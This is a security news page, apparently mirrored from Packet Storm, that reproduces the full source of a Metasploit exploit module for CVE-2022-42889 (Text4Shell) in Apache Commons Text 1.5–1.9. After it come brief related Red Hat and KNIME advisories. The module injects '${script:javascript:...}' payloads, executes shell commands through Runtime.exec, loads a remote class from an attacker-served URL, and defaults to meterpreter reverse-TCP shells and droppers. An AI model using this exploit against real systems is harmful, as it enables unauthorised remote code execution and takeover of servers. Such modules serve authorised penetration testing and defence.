Security
Headlines
HeadlinesLatestCVEs

Headline

Apache Commons Text 1.9 Remote Code Execution

This Metasploit module exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to remote code execution. This is due to a logic flaw that makes the script, dns and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the script key. In order to exploit the vulnerabilities, the following requirements must be met: Run a version of Apache Commons Text from version 1.5 to 1.9, use the StringSubstitutor interpolator, and the target should run JDK versions prior to 15.

Packet Storm
#vulnerability#windows#linux#apache#js#git#java#rce#auth#docker#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::Java::HTTP::ClassLoader  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Commons Text RCE',        'Description' => %q{          This exploit takes advantage of the StringSubstitutor interpolator class,          which is included in the Commons Text library. A default interpolator          allows for string lookups that can lead to Remote Code Execution. This          is due to a logic flaw that makes the “script”, “dns” and “url” lookup          keys interpolated by default, as opposed to what it should be, according          to the documentation of the StringLookupFactory class. Those keys allow          an attacker to execute arbitrary code via lookups primarily using the          "script" key.          In order to exploit the vulnerabilities, the following requirements must          be met:          Run a version of Apache Commons Text from version 1.5 to 1.9          Use the StringSubstitutor interpolator          Target should run JDK < 15        },        'License' => MSF_LICENSE,        'Author' => [          'Alvaro Muñoz', # Original research          'Karthik UJ', # PoC          'Gaurav Jain', # Metasploit module        ],        'References' => [          ['CVE', '2022-42889'],          ['URL', 'https://sysdig.com/blog/cve-2022-42889-text4shell/'],          ['URL', 'https://github.com/karthikuj/cve-2022-42889-text4shell-docker']        ],        'Platform' => ['win', 'linux', 'unix', 'java'],        'Targets' => [          [            'Java (in-memory)',            {              'Type' => :java,              'Platform' => 'java',              'Arch' => ARCH_JAVA,              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }            },          ],          [            'Windows EXE Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :windows_dropper,              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_jjs' }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2022-10-13',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The target URI', '/']),      OptString.new('PARAM', [ true, 'The vulnerable parameter']),      OptEnum.new('METHOD', [ true, 'The HTTP method to use', 'GET', ['GET', 'POST']])    ])  end  def check    vprint_status("Checking if #{peer} can be exploited.")    res = send_exp    return CheckCode::Unknown('No response received from target.') unless res    # blind command injection using sleep command    sleep_time = rand(4..8)    vprint_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    _res, elapsed_time = Rex::Stopwatch.elapsed_time do      send_exp("java.lang.Thread.sleep(#{sleep_time * 1000})")    end    vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :java      # Start the HTTP server to serve the payload      start_service      # Trigger a loadClass request via java.net.URLClassLoader      trigger_urlclassloader      # Handle the payload      handler    when :windows_cmd, :unix_cmd      execute_command(payload.encoded)    when :windows_dropper, :linux_dropper      execute_cmdstager    end  end  def trigger_urlclassloader    url = get_uri    vars = Rex::RandomIdentifier::Generator.new    exp = "var #{vars[:str_arr]} = Java.type('java.lang.String[]');"    exp << "var #{vars[:obj]} = new java.net.URLClassLoader([new java.net.URL(new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(url)}')))]).loadClass('metasploit.Payload');"    exp << "#{vars[:obj]}.getMethod('main', java.lang.Class.forName('[Ljava.lang.String;')).invoke(null, [new #{vars[:str_arr]}(1)]);"    res = send_exp(exp)    fail_with(Failure::Unreachable, 'No response received from the target') unless res    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200  end  def execute_command(cmd, _opts = {})    vars = Rex::RandomIdentifier::Generator.new    exp = "var #{vars[:arr]} = [#{win_target? ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'}, new java.lang.String(java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\"))];"    exp << "java.lang.Runtime.getRuntime().exec(#{vars[:arr]});"    res = send_exp(exp)    fail_with(Failure::Unreachable, 'No response received from the target') unless res    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200  end  def send_exp(exp = '')    vars = datastore['METHOD'] == 'GET' ? 'vars_get' : 'vars_post'    send_request_cgi(      'method' => datastore['METHOD'],      'uri' => normalize_uri(target_uri.path),      vars => {        datastore['PARAM'] => "${script:javascript:#{exp}}"      }    )  end  def win_target?    target['Platform'] == 'win'  end  def on_request_uri(cli, request)    case target['Type']    when :java      # Call method to handle java payload staging      super(cli, request)    else      # Handle win/unix cmd staging      client = cli.peerhost      print_status("Client #{client} requested #{request.uri}")      print_status("Sending payload to #{client}")      send_response(cli, exe)    end  endend

Related news

Red Hat Security Advisory 2024-3527-03

Red Hat Security Advisory 2024-3527-03 - Red Hat AMQ Streams 2.7.0 is now available from the Red Hat Customer Portal. Issues addressed include buffer overflow, denial of service, integer overflow, memory leak, and resource exhaustion vulnerabilities.

CVE-2023-3140: Security Advisories | KNIME

Missing HTTP headers (X-Frame-Options, Content-Security-Policy) in KNIME Business Hub before 1.4.0 has left users vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such as a button or link, to another server in which they have an identical webpage. The attacker essentially hijacks the user activity intended for the original server and sends them to the other server.

CVE-2023-2541: Security Advisories | KNIME

The Web Frontend of KNIME Business Hub before 1.4.0 allows an unauthenticated remote attacker to access internals about the application such as versions, host names, or IP addresses. No personal information or application data was exposed.

CVE-2023-2535: Security Advisories | KNIME

Sensitive information exposure in the Web Frontend of KNIME Business Hub until 1.X allows an unauthenticated attacker to extract information about the system. By making a request to a non-existent URL the system will sensitive information to the caller such as internal IP addresses, hostnames, Istio metadata, internal file paths and more. The problem is fixed in KNIME Business Hub 1.xxx. There is no workaround for previous versions.

RHSA-2023:1866: Red Hat Security Advisory: OpenShift Container Platform 4.10.58 security update

Red Hat OpenShift Container Platform release 4.10.58 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.10. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-42889: A flaw was found in Apache Commons Text packages 1.5 through 1.9. The affected versions allow an attacker to benefit from a variable interpolation process contained in Apache Common...

Red Hat Security Advisory 2023-0261-02

Red Hat Security Advisory 2023-0261-02 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

Red Hat Security Advisory 2022-8902-01

Red Hat Security Advisory 2022-8902-01 - This release of Camel for Spring Boot 3.18.3 serves as a replacement for Camel for Spring Boot 3.14.2 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include a denial of service vulnerability.

RHSA-2022:8902: Red Hat Security Advisory: Red Hat Camel for Spring Boot 3.18.3 release and security update

A minor version update (from 3.14.5 to 3.18.3) is now available for Camel for Spring Boot. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-25897: sdk-server: Denial of Service * CVE-2022-31684: reactor-netty-http: Log request headers in some cases of invalid HTTP requests * CVE-2022-42889: apache-commons-text: variable interpolation RCE

CVE-2022-44749: Security Advisories | KNIME

A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Analytics Platform 3.2.0 and above can result in arbitrary files being overwritten on the user's system. This vulnerability is also known as 'Zip-Slip'. An attacker can create a KNIME workflow that, when being opened by a user, can overwrite arbitrary files that the user has write access to. It's not necessary to execute the workflow, opening the workflow is sufficient. The user will notice that something is wrong because an error is being reported but only after the files have already been written. This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the user. In all cases the attacker has to know the location of files on the user's system, though.

CVE-2022-42889

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolator...

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution